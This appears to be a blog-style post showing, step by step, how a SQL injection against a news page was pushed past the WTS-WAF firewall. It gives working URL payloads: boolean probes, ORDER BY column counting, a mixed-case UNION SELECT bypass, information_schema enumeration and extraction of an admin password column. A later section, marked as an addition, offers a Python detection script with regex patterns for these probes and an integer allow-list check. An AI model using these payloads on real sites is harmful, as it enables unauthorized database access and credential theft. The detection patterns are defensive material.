Notes on getting a SQL injection past WTS-WAF


http://xxx.com/news_blank.php?id=296 and 1=1

 

http://xxxxx.com/news_blank.php?id=296+and+1=1

 

http://xxxx.com/news_blank.php?id=296+and+1=2

 

 

This confirms the injection.

 

http://xxxx.com/news_blank.php?id=296 order by 11  (correct)

http://xxxx.com/news_blank.php?id=296 order by 12  (error)

 

http://xxxx.com/news_blank.php?id=296 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11  (blocked)

 

http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11--+

 

 

Bypass succeeded.

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11--+

 

 

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2

Get the database names.

 

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11  from information_schema.tables where table_schema='hengdong' limit 0,1

Query the table names.

 

There were too many table names, so I wrote a Python script.

 

http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11  from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4

Query the column names.

 

http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,version(),9,10,11  from hdwl_admin

Query the contents of the column.
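
Added example, not part of the original post: in the requests above, the lowercase, space-separated `union select` form was blocked while the `+`-separated `UnIoN SeLeCT` form passed. This Python log-review sketch decodes and lowercases the query string before matching, so both forms produce the same finding, and adds an allow-list check that `id` is digits only. Rule names, function names and sample request lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Rules run on the normalized query string, never on the raw request bytes.
RULES = {
    "boolean_probe": re.compile(r"\b(?:and|or) \d+ ?= ?\d+"),
    "order_by_probe": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (?:all )?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b"),
}

def normalize(query: str) -> str:
    """Percent-decode ('+' becomes space), collapse whitespace, lowercase."""
    decoded = unquote_plus(query)
    return re.sub(r"\s+", " ", decoded).strip().lower()

def findings(url: str) -> list:
    """Return the sorted names of the rules matched by the URL's query string."""
    norm = normalize(url.partition("?")[2])
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def id_is_integer(url: str) -> bool:
    """Allow-list check: exactly one `id` value, ASCII digits only."""
    values = parse_qs(url.partition("?")[2]).get("id", [])
    return len(values) == 1 and re.fullmatch(r"[0-9]{1,10}", values[0]) is not None

# Constructed samples modelled on the request shapes shown in this post.
SAMPLES = [
    "/news_blank.php?id=296",
    "/news_blank.php?id=296%20and%201=2%20union%20select%201,2,3",
    "/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3--+",
    "/news_blank.php?id=296+order+by+12",
    "/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3+from+information_schema.schemata",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = "ok" if id_is_integer(sample) else "reject"
        print(f"{verdict:6} {findings(sample)} {sample}")
```

The allow-list check rejects every probe regardless of keyword spelling, which is why validating `id` as an integer (and binding it as a query parameter) holds where keyword matching did not.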

